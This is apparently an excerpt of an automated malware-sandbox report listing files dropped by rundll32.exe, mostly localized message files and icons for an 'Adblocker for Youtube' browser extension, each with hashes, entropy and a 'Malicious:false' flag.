Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):149
Entropy (8bit):4.915447629764539
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWQeDl8K5gBZYK/R7WHM+O3eC4omW+FkkW5Hb+511n:bk/dP6Gyyl826R7IOuNo+Fsa
MD5:1AD07246758F88714FD02AEE442F86EC
SHA1:64CC12DF3A673E2673F55C3D0D7683B5D8DF99BD
SHA-256:4F19A929F71B3A20E145B12B61377E610D70CA1A020CEE8D0E8EBF38D7F1F0CA
SHA-512:2D7BBF619D25C382B6357372CA7A29DA22B682FC3B12795A83654DFE109EB1CCB81E4D7304354A9B3AC324C7D9822E0A81563CA8920BC06DFFA733BA3C849168
Malicious:false
Preview:.{"appName":{"message":"Adblocker u. \" Youtube.\""},"appDesc":{"message":"Ie.kote video adblock? Kad parsisi.sti Adblocker \"Youtube\".."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):149
Entropy (8bit):4.9824655648065
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW8xBBVR7WHTfPIOJ5itFC/hqQ5hHHB2W8xBT1n:bk/dP6GeRVR7SfPzJ8tFIdFBWj1
MD5:C903EB1F9762BB428DF73858E79FC5C6
SHA1:D367BEF71658D76611A2E7F0E5FA3F8AAC3EBE43
SHA-256:BD607C80998190DE84D4D5610A2B8F4BCEE0D9500BC753DDFEB0B5A94F4DD4AE
SHA-512:1EC0115709D39F34C503F383B896442B4D34A5529F142D352A1ED94F4D275BAD3385EA9ADD4B5035E9BCAFA46452FF25C0C8074606200B29E627430E9D333AD0
Malicious:false
Preview:.{"appName":{"message":"Adblocker Youtube."},"appDesc":{"message":"Vai j.s mekl.jat video adblock? Lai lejupiel.d.tu Adblocker Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):194
Entropy (8bit):4.959575701188163
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOW1SfGKgBBVR7WHVxEdO9aX1jF0l1V1yVF1Gv1lhaiVVfoEgGqOTg:bk/dP6G7RVR7UxEUYXPdvYv88VQEoRj1
MD5:711BE6153463FB924A8CB817DC59DCEC
SHA1:13CB5590E37FC03385875640AB40D87C8640DB7E
SHA-256:28DF1E64F5E5EE71277B6C154A7905F11C20C6C1115433DF23485FAE299AD7AE
SHA-512:7B276E3675D004A3337D0F38F828D7BB4AB8E2F23C2BEDFE29496DC700C71E62727C20533BBF0A45F9119A452404D2658B63F6A7BB1052DA7F862024F32AD0EE
Malicious:false
Preview:.{"appName":{"message":"Adblocker .. Youtube."},"appDesc":{"message":".... ... .. ....... .. ..... adblock? .... ......... Adblocker .. Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):153
Entropy (8bit):4.778562590537941
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWToFBBVR7WHHaQgFfqFG3C3C4pIHWWToFBT1n:bk/dP6G+VVR7GaQK3a62f1
MD5:7EECC4311200A6726C4EDFCEEAEF1220
SHA1:A97F8C0E81CACCC9FA581DC44DA73E7234DC53A0
SHA-256:EA3C7300E6523FE08C28F073E7A34D043467E6EED330A031BC23CADA905762DC
SHA-512:2DCE3EA0649FD1946C40AAB054CBF37CA3E7EEE66DB0A8A0335F0BE3C0622A5C1714C7312A8BCE92667EF955845AC4E78E7B4B83D3C96DD425371EE9A77F5E70
Malicious:false
Preview:.{"appName":{"message":"Adblocker voor Youtube."},"appDesc":{"message":"Bent u op zoek voor video adblock? Dus download Adblocker voor Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):152
Entropy (8bit):4.887676383355589
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHA0Fn8RRrdCg1JEWG/WDMF8xBT1n:bk/dP6G5VR7gn0JV1JE61
MD5:CE1C94D6CE80894AC99A2E9076B30B7C
SHA1:BB67FF27CB03C4DE720390BD03B417E96DC8B4AB
SHA-256:DA8F186B15A95192E69A3924545DE56516C7618236E85BD2C84AB3AAD8B117FB
SHA-512:D713C90E9B670CBDC2C2BE8C5F0080FDF93A7CA8B2BFE5D3410B452FE68BBFDEC98A9A6DD3CA13146ED6B0AD9B28A3A97D27B8E044A5758949B185531BB619DA
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Er du p. jakt etter video adblock? S. last ned Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):161
Entropy (8bit):4.896417588493298
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVEUJL2gBBVR7WHTkP6Wk01KzE2LRxKFHltkZWVEUJL2gBT1n:bk/dP6GLJRVR7SzW9KzlLRM9ltk6Jj1
MD5:5C5A1426FF0C1128C1C6B8BC20CA29AC
SHA1:0E3540B647B488225C9967FF97AFC66319102CCD
SHA-256:5E206DD2DAD597AC1D7FE5A94FF8A1A75F189D1FE41C8144DF44E3093A46B839
SHA-512:1F61809A42B7F34A3C7D40B28AA4B4979AE94B52211B8F08362C54BBB64752FA1B9CC0C6D69E7DAB7E5C49200FB253F0CFF59A64D98B23C0B24D7E024CEE43C4
Malicious:false
Preview:.{"appName":{"message":"Adblocker para o Youtube."},"appDesc":{"message":"Voc. est. procurando v.deo adblock? Ent.o baixe Adblocker para o Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):262
Entropy (8bit):4.5033681386610525
Encrypted:false
SSDEEP:6:bk/dPeARd/5yXZEcVR7U95DRd/2XfUbvYfWbsRd/5yXZ0Y:4dmARh5cekFU9lRhSfUEW4Rh5cKY
MD5:CA49D076ACD74F2FAF38C51BB94A7655
SHA1:3CFC0948599DEA9B054019A27B4EAC0EC0546EF1
SHA-256:506CFB234C07A5087B7522469415660710FD9112BEFFFF2008C6E68DC05F0A3B
SHA-512:ADCCDD574363EC1E01D903496A1F7E4C50AC65AAB82C564B14D0749FDE22A7C0FD1FD25DF809B3FCEE0235CA1FEED6EF2DCE8D9E225758178B9F21D77D7D5C27
Malicious:false
Preview:.{"appName":{"message":"........... ....... ... ......"},"appDesc":{"message":"..... ........... ..... .......? ..... ......... ........... ....... ... ......."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):143
Entropy (8bit):5.010701769608737
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWLt2gBBVR7WHNhbAyA2eCnngXR3L1hxJMWLt2gBT1n:bk/dP6GlVR7Mh8p3+gB3pXX1
MD5:A43FFF6CFE872C583DB062871D25CA36
SHA1:37F424E9CAF6604C494CFE5852939928579D57F3
SHA-256:4988A2D80C4F9E21C5C1614E3499C85A363E945D1288BC855A4A716A7FA5CA20
SHA-512:8C83C839805402FBDA12B27E9730E3815A286A37A6880202068C23F74603FE970ED3BF4C03F6F7AA194909E33AD2FA9A1DA21AA3F2D2A04516FD719DA565A6B0
Malicious:false
Preview:.{"appName":{"message":"Adblocker na Youtube."},"appDesc":{"message":"H.ad.te video adblock? Tak.e stiahnu. Adblocker na Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):138
Entropy (8bit):4.923079352507677
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWft2gBBVR7WHMgE/RAFJeCnnGF6JMWft2gBT1n:bk/dP6G5VR7y7i+S6j1
MD5:D8084714517DD44C55C4CD0F73A2B0BD
SHA1:ED51C0EE20DDF94E3ED1E2F95FDBE62921098B96
SHA-256:B0F22F0F3C8361CAD77040ACD0FBFC8904D697F108119F0CAC61C35243EA0729
SHA-512:DAA57D28D044C594F85B5FA0A22FD7498165904861CCD33AC84F58314AB3414618F08C67D58E3473C8CF67C97588E6D69FE68C401360B55E24BB2C2725414083
Malicious:false
Preview:.{"appName":{"message":"Adblocker za Youtube."},"appDesc":{"message":"I..ete video adblock? Tako prenesi Adblocker za Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):171
Entropy (8bit):4.969371046083134
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWVmBFBBVR7WHPaDFJDwOSC47/MSLJMWVmBFBT1n:bk/dP6GwVVR7OmsOSNzMpf1
MD5:BED2C5E327380FAD31DD34DFF7874A74
SHA1:86AC1C9F97B35A01B340C0B1ADB2529517F2B641
SHA-256:481D2C35471F8C852438AD51BD45B237FCD29A6FF859AD7EC25D4F195FA17B13
SHA-512:B308D0F1F61B179D2F7CAABCCBA2488FAE4FF50A8A186F4EAB8E7B0F0AC1C14B38EE44DA6D76E6234BF119965BA03B30D72524A4838FB6A9952BE2CD9AC8656B
Malicious:false
Preview:.{"appName":{"message":"Adblocker p.r Youtube."},"appDesc":{"message":"Ju jeni n. k.rkim p.r video adblock? K.shtu q. t. shkarkoni Adblocker p.r Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.913200195070275
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDmTWxBBVR7WHJAiXFPmVkJEBHW1JE3s01WDmTWxBT1n:bk/dP6GZRVR7I9EV1W1JE3sfj1
MD5:910A00B8A4A73C896AAD63A769D682E8
SHA1:B99FB9F9195908EC1213E5DC0DAB5676CD01A08B
SHA-256:89DDAFA626E66297FE0FFB684756D959AC5774DA65197CCB7C1EEDAA7186CB42
SHA-512:E3F6F3D1AAA63E61ACE198EB116387AA3483DCB4C43E6D92231500B71FB80022EB03A767872B7EF5CE4846DDF90F631D5472C62BE59106AA9A358123A14E650A
Malicious:false
Preview:.{"appName":{"message":"Adblocker f.r Youtube."},"appDesc":{"message":"Letar du efter videon adblock? S. ladda ner Adblocker f.r Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):141
Entropy (8bit):4.98798149548062
Encrypted:false
SSDEEP:3:bk/rhPUHcxBiMxIkZUkkVVR7WHTlbPtXCcAWaGK5gBiMxKBWIpKZYHYY:bk/dPvviVR7SlbtCY/UWp6
MD5:9222A5F6A75F38F60ABF1D5F5137CFE3
SHA1:81837EA5D2788D5FFFF21DB29977DDEE50FDB00A
SHA-256:EC917A8DCB1D40EAB935C4BC7F9F9057CF7AF892D56DEBC945DD283A294766F8
SHA-512:9DC69347DB4BE3D15452C0C04B3E456F202707D3868884B201B80A7C19A89D437A70B7B67886873C73BD1BD475033348DA8FCB9B93B501AF8C358F7784FDB245
Malicious:false
Preview:.{"appName":{"message":"Youtube.i.in Adblocker"},"appDesc":{"message":"Video adblock ar.yorsunuz? Youtube.i.in indirme Adblocker."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):198
Entropy (8bit):4.820396470880301
Encrypted:false
SSDEEP:6:bk/dPe1Sq89abu1VR7U3ydX8d0v+cHf5Vqaq89abu/1:4dm1SlAeFUyX8d0WaqCAI1
MD5:984B0001491DCC9814D4954EB7009008
SHA1:AB87E0E7A8DAB7D178CE00551B943F67E683DF21
SHA-256:AA3211517E590FDAF9866DC06C59018C16617109782866466F8296741EAE7400
SHA-512:F80E86CE6BC1EF2F272296B7BF7E84C89A2BBE10A5BE0719CA913ABAA482F520CB6BBF416E2704D70783434EBB7A4B8295006EC883D3D47847F435061FB93F3E
Malicious:false
Preview:.{"appName":{"message":".......... ... YouTube."},"appDesc":{"message":".. ....... ..... ......? ... ....... .......... ... YouTube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):5037
Entropy (8bit):7.905954051333691
Encrypted:false
SSDEEP:96:oSu1bZFj7Yc0jwjB366savGst6Fu3lUPH0AETYRgRY5Ib1zOgvAZhhx9CE1KVK8Q:oSu9ZuFS16navGstqeKH0RtIk16gIZ9r
MD5:D2CEC80B28B9BE2E46D12CFCBCBD3A52
SHA1:2FDAC2E9A2909CFDCA5DF717DCC36A9D0CA8396A
SHA-256:6D38E0BE2E6C189DE3E4D739BAE9986EE365A33BAF99A9234E5C9EFFB44B791A
SHA-512:89798889D41CFC687A31C820AEA487722B04EA40F7FD07CE899A0E215B7B1703380188BA103825A4B863F8CBCA76430BFC437705630F0BFCAFFD50A78C2BB295
Malicious:false
Preview:.PNG........IHDR..............>a.....bKGD..............pHYs.................tIME.....%&.OMe...:IDATx..]i...y~.....].V+iW.t@.'.....?...(...._.cc.p...9.........%s(...U&.WH%N.J~.8.l.T...5.`........7?.g...{.{.ggv.......{...... .\r.%.\r.%.\r.%.\r.%.\r.%.\r.%.\FI.Z..5..C1..Z...o..x...|....{&....*.P.....R.v....U....TN......K...t.X....{...m.3?X.{.$.......".. .+. yR._7.....+}.m... ...T......AY....@BC........2;<`.. ...W...,.)..r..Mj.;.......[....'..!....B....G.ulw...i.I.v.0......U.Cw. ..`W.....H.....@.k...Q.faW...0..'z.$!....Cw]/K[.N...CE...`.......k..p.^.zc,./..3E...^a..&.P.PKpm.......n-..6.}m...#[.......71s.Q......^/."A`.?.....(.....D ..._...S.........k......|q...-.U..l....j...S).}...._...W2....Y@...CwJ}b.Y.`(...O.=o.s..V.:.R_.`...0.D.J(.....]0.....8.U../!y...wh...$.P......o.W..PL\...=3..bL.....i(...*..]..xX.....G...L..f.Bb.c.{f....G......kn..w.4,.......u;af@.a..E..+~..Z...f...=..C.4../'.. ....-.x.w.u;a......a..}.V .8.5 .X:.u.x.5h..".....?.....
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):7197
Entropy (8bit):7.962463224314917
Encrypted:false
